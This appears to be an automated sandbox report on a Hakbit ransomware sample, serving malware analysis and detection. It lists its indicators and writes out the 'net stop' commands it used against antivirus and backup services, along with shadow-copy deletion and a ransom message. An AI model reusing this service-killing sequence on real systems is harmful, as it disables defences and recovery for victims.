Analysis
- max time kernel: 139s
- max time network: 97s
- platform: windows7_x64
- resource: win7v200430
- submitted: 18-06-2020 04:28

Static task: static1
Behavioral task: behavioral1 (Sample: System.exe, Resource: win7v200430)
Behavioral task: behavioral2 (Sample: System.exe, Resource: win10)

General
- Target: System.exe
- Size: 66KB
- MD5: 8d6ab03994b0ce3466873aa7532fe76b
- SHA1: 156aecd4d8e65d205181ad5eace466c8798d3c86
- SHA256: e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62
- SHA512: 2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 390 IoCs
description pid Process procid_target PID 1312 wrote to memory of 1480 1312 System.exe 24 PID 1312 wrote to memory of 1480 1312 System.exe 24 PID 1312 wrote to memory of 1480 1312 System.exe 24 PID 1480 wrote to memory of 544 1480 net.exe 26 PID 1480 wrote to memory of 544 1480 net.exe 26 PID 1480 wrote to memory of 544 1480 net.exe 26 PID 1312 wrote to memory of 1012 1312 System.exe 27 PID 1312 wrote to memory of 1012 1312 System.exe 27 PID 1312 wrote to memory of 1012 1312 System.exe 27 PID 1012 wrote to memory of 1612 1012 net.exe 29 PID 1012 wrote to memory of 1612 1012 net.exe 29 PID 1012 wrote to memory of 1612 1012 net.exe 29 PID 1312 wrote to memory of 240 1312 System.exe 30 PID 1312 wrote to memory of 240 1312 System.exe 30 PID 1312 wrote to memory of 240 1312 System.exe 30 PID 240 wrote to memory of 1068 240 net.exe 32 PID 240 wrote to memory of 1068 240 net.exe 32 PID 240 wrote to memory of 1068 240 net.exe 32 PID 1312 wrote to memory of 1088 1312 System.exe 33 PID 1312 wrote to memory of 1088 1312 System.exe 33 PID 1312 wrote to memory of 1088 1312 System.exe 33 PID 1088 wrote to memory of 1520 1088 net.exe 35 PID 1088 wrote to memory of 1520 1088 net.exe 35 PID 1088 wrote to memory of 1520 1088 net.exe 35 PID 1312 wrote to memory of 1668 1312 System.exe 36 PID 1312 wrote to memory of 1668 1312 System.exe 36 PID 1312 wrote to memory of 1668 1312 System.exe 36 PID 1668 wrote to memory of 1360 1668 net.exe 38 PID 1668 wrote to memory of 1360 1668 net.exe 38 PID 1668 wrote to memory of 1360 1668 net.exe 38 PID 1312 wrote to memory of 1764 1312 System.exe 39 PID 1312 wrote to memory of 1764 1312 System.exe 39 PID 1312 wrote to memory of 1764 1312 System.exe 39 PID 1764 wrote to memory of 1824 1764 net.exe 41 PID 1764 wrote to memory of 1824 1764 net.exe 41 PID 1764 wrote to memory of 1824 1764 net.exe 41 PID 1312 wrote to memory of 1836 1312 System.exe 42 PID 1312 wrote to memory of 1836 1312 System.exe 42 PID 1312 wrote to memory of 1836 1312 System.exe 42 
PID 1836 wrote to memory of 1844 1836 net.exe 44 PID 1836 wrote to memory of 1844 1836 net.exe 44 PID 1836 wrote to memory of 1844 1836 net.exe 44 PID 1312 wrote to memory of 1788 1312 System.exe 45 PID 1312 wrote to memory of 1788 1312 System.exe 45 PID 1312 wrote to memory of 1788 1312 System.exe 45 PID 1788 wrote to memory of 1768 1788 net.exe 47 PID 1788 wrote to memory of 1768 1788 net.exe 47 PID 1788 wrote to memory of 1768 1788 net.exe 47 PID 1312 wrote to memory of 652 1312 System.exe 48 PID 1312 wrote to memory of 652 1312 System.exe 48 PID 1312 wrote to memory of 652 1312 System.exe 48 PID 652 wrote to memory of 864 652 net.exe 50 PID 652 wrote to memory of 864 652 net.exe 50 PID 652 wrote to memory of 864 652 net.exe 50 PID 1312 wrote to memory of 984 1312 System.exe 51 PID 1312 wrote to memory of 984 1312 System.exe 51 PID 1312 wrote to memory of 984 1312 System.exe 51 PID 984 wrote to memory of 616 984 net.exe 53 PID 984 wrote to memory of 616 984 net.exe 53 PID 984 wrote to memory of 616 984 net.exe 53 PID 1312 wrote to memory of 1316 1312 System.exe 54 PID 1312 wrote to memory of 1316 1312 System.exe 54 PID 1312 wrote to memory of 1316 1312 System.exe 54 PID 1316 wrote to memory of 1624 1316 net.exe 56 PID 1316 wrote to memory of 1624 1316 net.exe 56 PID 1316 wrote to memory of 1624 1316 net.exe 56 PID 1312 wrote to memory of 1592 1312 System.exe 57 PID 1312 wrote to memory of 1592 1312 System.exe 57 PID 1312 wrote to memory of 1592 1312 System.exe 57 PID 1592 wrote to memory of 1636 1592 net.exe 59 PID 1592 wrote to memory of 1636 1592 net.exe 59 PID 1592 wrote to memory of 1636 1592 net.exe 59 PID 1312 wrote to memory of 1620 1312 System.exe 60 PID 1312 wrote to memory of 1620 1312 System.exe 60 PID 1312 wrote to memory of 1620 1312 System.exe 60 PID 1620 wrote to memory of 1896 1620 net.exe 62 PID 1620 wrote to memory of 1896 1620 net.exe 62 PID 1620 wrote to memory of 1896 1620 net.exe 62 PID 1312 wrote to memory of 1948 1312 System.exe 63 PID 
1312 wrote to memory of 1948 1312 System.exe 63 PID 1312 wrote to memory of 1948 1312 System.exe 63 PID 1948 wrote to memory of 1888 1948 net.exe 65 PID 1948 wrote to memory of 1888 1948 net.exe 65 PID 1948 wrote to memory of 1888 1948 net.exe 65 PID 1312 wrote to memory of 1892 1312 System.exe 66 PID 1312 wrote to memory of 1892 1312 System.exe 66 PID 1312 wrote to memory of 1892 1312 System.exe 66 PID 1892 wrote to memory of 1968 1892 net.exe 68 PID 1892 wrote to memory of 1968 1892 net.exe 68 PID 1892 wrote to memory of 1968 1892 net.exe 68 PID 1312 wrote to memory of 1980 1312 System.exe 69 PID 1312 wrote to memory of 1980 1312 System.exe 69 PID 1312 wrote to memory of 1980 1312 System.exe 69 PID 1980 wrote to memory of 2028 1980 net.exe 71 PID 1980 wrote to memory of 2028 1980 net.exe 71 PID 1980 wrote to memory of 2028 1980 net.exe 71 PID 1312 wrote to memory of 856 1312 System.exe 72 PID 1312 wrote to memory of 856 1312 System.exe 72 PID 1312 wrote to memory of 856 1312 System.exe 72 PID 856 wrote to memory of 1200 856 net.exe 74 PID 856 wrote to memory of 1200 856 net.exe 74 PID 856 wrote to memory of 1200 856 net.exe 74 PID 1312 wrote to memory of 1104 1312 System.exe 75 PID 1312 wrote to memory of 1104 1312 System.exe 75 PID 1312 wrote to memory of 1104 1312 System.exe 75 PID 1104 wrote to memory of 1484 1104 net.exe 77 PID 1104 wrote to memory of 1484 1104 net.exe 77 PID 1104 wrote to memory of 1484 1104 net.exe 77 PID 1312 wrote to memory of 1492 1312 System.exe 78 PID 1312 wrote to memory of 1492 1312 System.exe 78 PID 1312 wrote to memory of 1492 1312 System.exe 78 PID 1492 wrote to memory of 1572 1492 net.exe 80 PID 1492 wrote to memory of 1572 1492 net.exe 80 PID 1492 wrote to memory of 1572 1492 net.exe 80 PID 1312 wrote to memory of 836 1312 System.exe 81 PID 1312 wrote to memory of 836 1312 System.exe 81 PID 1312 wrote to memory of 836 1312 System.exe 81 PID 836 wrote to memory of 1612 836 net.exe 83 PID 836 wrote to memory of 1612 836 net.exe 83 
PID 836 wrote to memory of 1612 836 net.exe 83 PID 1312 wrote to memory of 848 1312 System.exe 84 PID 1312 wrote to memory of 848 1312 System.exe 84 PID 1312 wrote to memory of 848 1312 System.exe 84 PID 848 wrote to memory of 324 848 net.exe 86 PID 848 wrote to memory of 324 848 net.exe 86 PID 848 wrote to memory of 324 848 net.exe 86 PID 1312 wrote to memory of 1064 1312 System.exe 87 PID 1312 wrote to memory of 1064 1312 System.exe 87 PID 1312 wrote to memory of 1064 1312 System.exe 87 PID 1064 wrote to memory of 1524 1064 net.exe 89 PID 1064 wrote to memory of 1524 1064 net.exe 89 PID 1064 wrote to memory of 1524 1064 net.exe 89 PID 1312 wrote to memory of 1376 1312 System.exe 90 PID 1312 wrote to memory of 1376 1312 System.exe 90 PID 1312 wrote to memory of 1376 1312 System.exe 90 PID 1376 wrote to memory of 1380 1376 net.exe 92 PID 1376 wrote to memory of 1380 1376 net.exe 92 PID 1376 wrote to memory of 1380 1376 net.exe 92 PID 1312 wrote to memory of 1816 1312 System.exe 93 PID 1312 wrote to memory of 1816 1312 System.exe 93 PID 1312 wrote to memory of 1816 1312 System.exe 93 PID 1816 wrote to memory of 1828 1816 net.exe 95 PID 1816 wrote to memory of 1828 1816 net.exe 95 PID 1816 wrote to memory of 1828 1816 net.exe 95 PID 1312 wrote to memory of 1792 1312 System.exe 96 PID 1312 wrote to memory of 1792 1312 System.exe 96 PID 1312 wrote to memory of 1792 1312 System.exe 96 PID 1792 wrote to memory of 1784 1792 net.exe 98 PID 1792 wrote to memory of 1784 1792 net.exe 98 PID 1792 wrote to memory of 1784 1792 net.exe 98 PID 1312 wrote to memory of 1768 1312 System.exe 99 PID 1312 wrote to memory of 1768 1312 System.exe 99 PID 1312 wrote to memory of 1768 1312 System.exe 99 PID 1768 wrote to memory of 568 1768 net.exe 101 PID 1768 wrote to memory of 568 1768 net.exe 101 PID 1768 wrote to memory of 568 1768 net.exe 101 PID 1312 wrote to memory of 368 1312 System.exe 102 PID 1312 wrote to memory of 368 1312 System.exe 102 PID 1312 wrote to memory of 368 1312 
System.exe 102 PID 368 wrote to memory of 1516 368 net.exe 104 PID 368 wrote to memory of 1516 368 net.exe 104 PID 368 wrote to memory of 1516 368 net.exe 104 PID 1312 wrote to memory of 300 1312 System.exe 105 PID 1312 wrote to memory of 300 1312 System.exe 105 PID 1312 wrote to memory of 300 1312 System.exe 105 PID 300 wrote to memory of 1624 300 net.exe 107 PID 300 wrote to memory of 1624 300 net.exe 107 PID 300 wrote to memory of 1624 300 net.exe 107 PID 1312 wrote to memory of 1256 1312 System.exe 108 PID 1312 wrote to memory of 1256 1312 System.exe 108 PID 1312 wrote to memory of 1256 1312 System.exe 108 PID 1256 wrote to memory of 1600 1256 net.exe 110 PID 1256 wrote to memory of 1600 1256 net.exe 110 PID 1256 wrote to memory of 1600 1256 net.exe 110 PID 1312 wrote to memory of 1564 1312 System.exe 111 PID 1312 wrote to memory of 1564 1312 System.exe 111 PID 1312 wrote to memory of 1564 1312 System.exe 111 PID 1564 wrote to memory of 1568 1564 net.exe 113 PID 1564 wrote to memory of 1568 1564 net.exe 113 PID 1564 wrote to memory of 1568 1564 net.exe 113 PID 1312 wrote to memory of 1908 1312 System.exe 114 PID 1312 wrote to memory of 1908 1312 System.exe 114 PID 1312 wrote to memory of 1908 1312 System.exe 114 PID 1908 wrote to memory of 1900 1908 net.exe 116 PID 1908 wrote to memory of 1900 1908 net.exe 116 PID 1908 wrote to memory of 1900 1908 net.exe 116 PID 1312 wrote to memory of 1984 1312 System.exe 117 PID 1312 wrote to memory of 1984 1312 System.exe 117 PID 1312 wrote to memory of 1984 1312 System.exe 117 PID 1984 wrote to memory of 1972 1984 net.exe 119 PID 1984 wrote to memory of 1972 1984 net.exe 119 PID 1984 wrote to memory of 1972 1984 net.exe 119 PID 1312 wrote to memory of 2032 1312 System.exe 120 PID 1312 wrote to memory of 2032 1312 System.exe 120 PID 1312 wrote to memory of 2032 1312 System.exe 120 PID 2032 wrote to memory of 1100 2032 net.exe 122 PID 2032 wrote to memory of 1100 2032 net.exe 122 PID 2032 wrote to memory of 1100 2032 net.exe 
122 PID 1312 wrote to memory of 1200 1312 System.exe 123 PID 1312 wrote to memory of 1200 1312 System.exe 123 PID 1312 wrote to memory of 1200 1312 System.exe 123 PID 1200 wrote to memory of 1488 1200 net.exe 125 PID 1200 wrote to memory of 1488 1200 net.exe 125 PID 1200 wrote to memory of 1488 1200 net.exe 125 PID 1312 wrote to memory of 1084 1312 System.exe 126 PID 1312 wrote to memory of 1084 1312 System.exe 126 PID 1312 wrote to memory of 1084 1312 System.exe 126 PID 1084 wrote to memory of 544 1084 net.exe 128 PID 1084 wrote to memory of 544 1084 net.exe 128 PID 1084 wrote to memory of 544 1084 net.exe 128 PID 1312 wrote to memory of 1060 1312 System.exe 129 PID 1312 wrote to memory of 1060 1312 System.exe 129 PID 1312 wrote to memory of 1060 1312 System.exe 129 PID 1060 wrote to memory of 1612 1060 net.exe 131 PID 1060 wrote to memory of 1612 1060 net.exe 131 PID 1060 wrote to memory of 1612 1060 net.exe 131 PID 1312 wrote to memory of 1616 1312 System.exe 132 PID 1312 wrote to memory of 1616 1312 System.exe 132 PID 1312 wrote to memory of 1616 1312 System.exe 132 PID 1312 wrote to memory of 1068 1312 System.exe 134 PID 1312 wrote to memory of 1068 1312 System.exe 134 PID 1312 wrote to memory of 1068 1312 System.exe 134 PID 1312 wrote to memory of 1092 1312 System.exe 136 PID 1312 wrote to memory of 1092 1312 System.exe 136 PID 1312 wrote to memory of 1092 1312 System.exe 136 PID 1312 wrote to memory of 1380 1312 System.exe 138 PID 1312 wrote to memory of 1380 1312 System.exe 138 PID 1312 wrote to memory of 1380 1312 System.exe 138 PID 1312 wrote to memory of 1852 1312 System.exe 140 PID 1312 wrote to memory of 1852 1312 System.exe 140 PID 1312 wrote to memory of 1852 1312 System.exe 140 PID 1312 wrote to memory of 1324 1312 System.exe 143 PID 1312 wrote to memory of 1324 1312 System.exe 143 PID 1312 wrote to memory of 1324 1312 System.exe 143 PID 1312 wrote to memory of 1000 1312 System.exe 145 PID 1312 wrote to memory of 1000 1312 System.exe 145 PID 1312 
wrote to memory of 1000 1312 System.exe 145 PID 1312 wrote to memory of 1936 1312 System.exe 147 PID 1312 wrote to memory of 1936 1312 System.exe 147 PID 1312 wrote to memory of 1936 1312 System.exe 147 PID 1312 wrote to memory of 1116 1312 System.exe 151 PID 1312 wrote to memory of 1116 1312 System.exe 151 PID 1312 wrote to memory of 1116 1312 System.exe 151 PID 1312 wrote to memory of 780 1312 System.exe 153 PID 1312 wrote to memory of 780 1312 System.exe 153 PID 1312 wrote to memory of 780 1312 System.exe 153 PID 1312 wrote to memory of 744 1312 System.exe 155 PID 1312 wrote to memory of 744 1312 System.exe 155 PID 1312 wrote to memory of 744 1312 System.exe 155 PID 1312 wrote to memory of 1212 1312 System.exe 157 PID 1312 wrote to memory of 1212 1312 System.exe 157 PID 1312 wrote to memory of 1212 1312 System.exe 157 PID 1312 wrote to memory of 520 1312 System.exe 159 PID 1312 wrote to memory of 520 1312 System.exe 159 PID 1312 wrote to memory of 520 1312 System.exe 159 PID 1312 wrote to memory of 1624 1312 System.exe 161 PID 1312 wrote to memory of 1624 1312 System.exe 161 PID 1312 wrote to memory of 1624 1312 System.exe 161 PID 1312 wrote to memory of 1632 1312 System.exe 163 PID 1312 wrote to memory of 1632 1312 System.exe 163 PID 1312 wrote to memory of 1632 1312 System.exe 163 PID 1312 wrote to memory of 2028 1312 System.exe 165 PID 1312 wrote to memory of 2028 1312 System.exe 165 PID 1312 wrote to memory of 2028 1312 System.exe 165 PID 1312 wrote to memory of 212 1312 System.exe 167 PID 1312 wrote to memory of 212 1312 System.exe 167 PID 1312 wrote to memory of 212 1312 System.exe 167 PID 1312 wrote to memory of 1556 1312 System.exe 169 PID 1312 wrote to memory of 1556 1312 System.exe 169 PID 1312 wrote to memory of 1556 1312 System.exe 169 PID 1312 wrote to memory of 1044 1312 System.exe 171 PID 1312 wrote to memory of 1044 1312 System.exe 171 PID 1312 wrote to memory of 1044 1312 System.exe 171 PID 1312 wrote to memory of 1508 1312 System.exe 173 PID 
1312 wrote to memory of 1508 1312 System.exe 173 PID 1312 wrote to memory of 1508 1312 System.exe 173 PID 1312 wrote to memory of 1524 1312 System.exe 175 PID 1312 wrote to memory of 1524 1312 System.exe 175 PID 1312 wrote to memory of 1524 1312 System.exe 175 PID 1312 wrote to memory of 1848 1312 System.exe 177 PID 1312 wrote to memory of 1848 1312 System.exe 177 PID 1312 wrote to memory of 1848 1312 System.exe 177 PID 1312 wrote to memory of 1600 1312 System.exe 179 PID 1312 wrote to memory of 1600 1312 System.exe 179 PID 1312 wrote to memory of 1600 1312 System.exe 179 PID 1312 wrote to memory of 608 1312 System.exe 181 PID 1312 wrote to memory of 608 1312 System.exe 181 PID 1312 wrote to memory of 608 1312 System.exe 181 PID 1312 wrote to memory of 236 1312 System.exe 183 PID 1312 wrote to memory of 236 1312 System.exe 183 PID 1312 wrote to memory of 236 1312 System.exe 183 PID 1312 wrote to memory of 1040 1312 System.exe 185 PID 1312 wrote to memory of 1040 1312 System.exe 185 PID 1312 wrote to memory of 1040 1312 System.exe 185 PID 1312 wrote to memory of 872 1312 System.exe 187 PID 1312 wrote to memory of 872 1312 System.exe 187 PID 1312 wrote to memory of 872 1312 System.exe 187 PID 1312 wrote to memory of 1612 1312 System.exe 189 PID 1312 wrote to memory of 1612 1312 System.exe 189 PID 1312 wrote to memory of 1612 1312 System.exe 189 PID 1312 wrote to memory of 1504 1312 System.exe 191 PID 1312 wrote to memory of 1504 1312 System.exe 191 PID 1312 wrote to memory of 1504 1312 System.exe 191 PID 1312 wrote to memory of 1804 1312 System.exe 193 PID 1312 wrote to memory of 1804 1312 System.exe 193 PID 1312 wrote to memory of 1804 1312 System.exe 193 PID 1312 wrote to memory of 1828 1312 System.exe 195 PID 1312 wrote to memory of 1828 1312 System.exe 195 PID 1312 wrote to memory of 1828 1312 System.exe 195 PID 1312 wrote to memory of 1932 1312 System.exe 197 PID 1312 wrote to memory of 1932 1312 System.exe 197 PID 1312 wrote to memory of 1932 1312 System.exe 
197 PID 1312 wrote to memory of 216 1312 System.exe 199 PID 1312 wrote to memory of 216 1312 System.exe 199 PID 1312 wrote to memory of 216 1312 System.exe 199 PID 1312 wrote to memory of 1560 1312 System.exe 201 PID 1312 wrote to memory of 1560 1312 System.exe 201 PID 1312 wrote to memory of 1560 1312 System.exe 201 PID 1312 wrote to memory of 748 1312 System.exe 203 PID 1312 wrote to memory of 748 1312 System.exe 203 PID 1312 wrote to memory of 748 1312 System.exe 203 PID 1312 wrote to memory of 1080 1312 System.exe 205 PID 1312 wrote to memory of 1080 1312 System.exe 205 PID 1312 wrote to memory of 1080 1312 System.exe 205 PID 1312 wrote to memory of 1516 1312 System.exe 207 PID 1312 wrote to memory of 1516 1312 System.exe 207 PID 1312 wrote to memory of 1516 1312 System.exe 207 PID 1312 wrote to memory of 1056 1312 System.exe 209 PID 1312 wrote to memory of 1056 1312 System.exe 209 PID 1312 wrote to memory of 1056 1312 System.exe 209 PID 1312 wrote to memory of 1544 1312 System.exe 211 PID 1312 wrote to memory of 1544 1312 System.exe 211 PID 1312 wrote to memory of 1544 1312 System.exe 211 PID 1312 wrote to memory of 544 1312 System.exe 213 PID 1312 wrote to memory of 544 1312 System.exe 213 PID 1312 wrote to memory of 544 1312 System.exe 213 PID 1312 wrote to memory of 1696 1312 System.exe 215 PID 1312 wrote to memory of 1696 1312 System.exe 215 PID 1312 wrote to memory of 1696 1312 System.exe 215 PID 1312 wrote to memory of 1292 1312 System.exe 217 PID 1312 wrote to memory of 1292 1312 System.exe 217 PID 1312 wrote to memory of 1292 1312 System.exe 217 PID 1312 wrote to memory of 632 1312 System.exe 219 PID 1312 wrote to memory of 632 1312 System.exe 219 PID 1312 wrote to memory of 632 1312 System.exe 219 PID 1312 wrote to memory of 1108 1312 System.exe 221 PID 1312 wrote to memory of 1108 1312 System.exe 221 PID 1312 wrote to memory of 1108 1312 System.exe 221 PID 1312 wrote to memory of 1824 1312 System.exe 223 PID 1312 wrote to memory of 1824 1312 
System.exe 223 PID 1312 wrote to memory of 1824 1312 System.exe 223 PID 1312 wrote to memory of 1308 1312 System.exe 225 PID 1312 wrote to memory of 1308 1312 System.exe 225 PID 1312 wrote to memory of 1308 1312 System.exe 225 PID 1312 wrote to memory of 232 1312 System.exe 227 PID 1312 wrote to memory of 232 1312 System.exe 227 PID 1312 wrote to memory of 232 1312 System.exe 227 PID 1312 wrote to memory of 1208 1312 System.exe 229 PID 1312 wrote to memory of 1208 1312 System.exe 229 PID 1312 wrote to memory of 1208 1312 System.exe 229 PID 1312 wrote to memory of 1008 1312 System.exe 231 PID 1312 wrote to memory of 1008 1312 System.exe 231 PID 1312 wrote to memory of 1008 1312 System.exe 231 PID 1312 wrote to memory of 1104 1312 System.exe 234 PID 1312 wrote to memory of 1104 1312 System.exe 234 PID 1312 wrote to memory of 1104 1312 System.exe 234 PID 1312 wrote to memory of 872 1312 System.exe 240 PID 1312 wrote to memory of 872 1312 System.exe 240 PID 1312 wrote to memory of 872 1312 System.exe 240 PID 1312 wrote to memory of 324 1312 System.exe 242 PID 1312 wrote to memory of 324 1312 System.exe 242 PID 1312 wrote to memory of 324 1312 System.exe 242 PID 1312 wrote to memory of 1292 1312 System.exe 247 PID 1312 wrote to memory of 1292 1312 System.exe 247 PID 1312 wrote to memory of 1292 1312 System.exe 247 PID 1312 wrote to memory of 364 1312 System.exe 248 PID 1312 wrote to memory of 364 1312 System.exe 248 PID 1312 wrote to memory of 364 1312 System.exe 248 PID 364 wrote to memory of 1104 364 cmd.exe 250 PID 364 wrote to memory of 1104 364 cmd.exe 250 PID 364 wrote to memory of 1104 364 cmd.exe 250 PID 364 wrote to memory of 1576 364 cmd.exe 252 PID 364 wrote to memory of 1576 364 cmd.exe 252 PID 364 wrote to memory of 1576 364 cmd.exe 252 PID 1312 wrote to memory of 324 1312 System.exe 253 PID 1312 wrote to memory of 324 1312 System.exe 253 PID 1312 wrote to memory of 324 1312 System.exe 253 PID 324 wrote to memory of 2012 324 cmd.exe 255 PID 324 wrote to 
memory of 2012 324 cmd.exe 255
Suspicious use of SendNotifyMessage 3 IoCs
pid   Process
1312  System.exe
1312  System.exe
1312  System.exe

Opens file in notepad (likely ransom note) 1 IoCs
pid   Process
1292  notepad.exe

Drops startup file 1 IoCs
- File created: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mystartup.lnk (System.exe)

Modifies WinLogon 2 TTPs 2 IoCs
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption = "Information..." (System.exe)
- Set value (str): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText = "\r\n*** ATTENTION ***\r\nYour File Locked By \"Military Algorithm\" And Wiped. \r\nFor Recovery Your Files Contact : [email protected]" (System.exe)

Suspicious use of FindShellTrayWindow 4 IoCs
pid   Process
1312  System.exe
1312  System.exe
1312  System.exe
1292  notepad.exe
Hakbit
Ransomware which encrypts files using AES, first seen in November 2019.

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.

Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Modifies file permissions 1 TTPs 29 IoCs
Process: icacls.exe
pids: 608, 232, 1104, 216, 1080, 1544, 1208, 544, 1612, 1932, 1516, 1056, 236, 1108, 1308, 324, 872, 1560, 748, 632, 1040, 1804, 1696, 1292, 872, 1504, 1828, 1824, 1008

Runs net.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs
description                pid   Process
Token: SeDebugPrivilege    1312  System.exe
Token: SeDebugPrivilege    1852  taskkill.exe
Token: SeDebugPrivilege    1324  taskkill.exe
Token: SeDebugPrivilege    1000  taskkill.exe
Token: SeBackupPrivilege   2004  vssvc.exe
Token: SeRestorePrivilege  2004  vssvc.exe
Token: SeAuditPrivilege    2004  vssvc.exe

Deletes itself 1 IoCs
pid   Process
324   cmd.exe

Interacts with shadow copies 2 TTPs 14 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Process: vssadmin.exe
pids: 1632, 1044, 1116, 744, 1524, 780, 1212, 2028, 1556, 1508, 1936, 520, 1624, 212

Kills process with taskkill 3 IoCs
pid   Process
1852  taskkill.exe
1324  taskkill.exe
1000  taskkill.exe

Runs ping.exe 1 TTPs 1 IoCs
pid   Process
1104  PING.EXE

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.

Modifies service 2 TTPs 5 IoCs
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
- Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
Processes
(process tree; indentation shows parent/child depth, signatures are listed under each process)

C:\Users\Admin\AppData\Local\Temp\System.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\System.exe"
  - Suspicious use of WriteProcessMemory
  - Suspicious use of SendNotifyMessage
  - Drops startup file
  - Modifies WinLogon
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of AdjustPrivilegeToken
  PID:1312

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop avpsus /y
      - Suspicious use of WriteProcessMemory
      PID:1480
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop avpsus /y
          PID:544

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop McAfeeDLPAgentService /y
      - Suspicious use of WriteProcessMemory
      PID:1012
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
          PID:1612

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop mfewc /y
      - Suspicious use of WriteProcessMemory
      PID:240
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop mfewc /y
          PID:1068

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop BMR Boot Service /y
      - Suspicious use of WriteProcessMemory
      PID:1088
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop BMR Boot Service /y
          PID:1520

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop NetBackup BMR MTFTP Service /y
      - Suspicious use of WriteProcessMemory
      PID:1668
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
          PID:1360

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop DefWatch /y
      - Suspicious use of WriteProcessMemory
      PID:1764
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop DefWatch /y
          PID:1824

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop ccEvtMgr /y
      - Suspicious use of WriteProcessMemory
      PID:1836
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop ccEvtMgr /y
          PID:1844

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop ccSetMgr /y
      - Suspicious use of WriteProcessMemory
      PID:1788
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop ccSetMgr /y
          PID:1768

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop SavRoam /y
      - Suspicious use of WriteProcessMemory
      PID:652
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop SavRoam /y
          PID:864

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop RTVscan /y
      - Suspicious use of WriteProcessMemory
      PID:984
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop RTVscan /y
          PID:616

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop QBFCService /y
      - Suspicious use of WriteProcessMemory
      PID:1316
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop QBFCService /y
          PID:1624

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop QBIDPService /y
      PID:1592
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop QBIDPService /y
          PID:1636

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop Intuit.QuickBooks.FCS /y
      PID:1620
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
          PID:1896

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop QBCFMonitorService /y
      PID:1948
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop QBCFMonitorService /y
          PID:1888

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop YooBackup /y
      PID:1892
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop YooBackup /y
          PID:1968

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop YooIT /y
      PID:1980
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop YooIT /y
          PID:2028

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop zhudongfangyu /y
      PID:856
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop zhudongfangyu /y
          PID:1200

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop stc_raw_agent /y
      PID:1104
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop stc_raw_agent /y
          PID:1484

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop VSNAPVSS /y
      PID:1492
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop VSNAPVSS /y
          PID:1572

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop VeeamTransportSvc /y
      PID:836
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop VeeamTransportSvc /y
          PID:1612

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop VeeamDeploymentService /y
      PID:848
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop VeeamDeploymentService /y
          PID:324

    C:\Windows\system32\net.exe
      Command line: "net.exe" stop VeeamNFSSvc /y
      PID:1064
        C:\Windows\system32\net1.exe
          Command line: C:\Windows\system32\net1 stop VeeamNFSSvc /y
          PID:1524

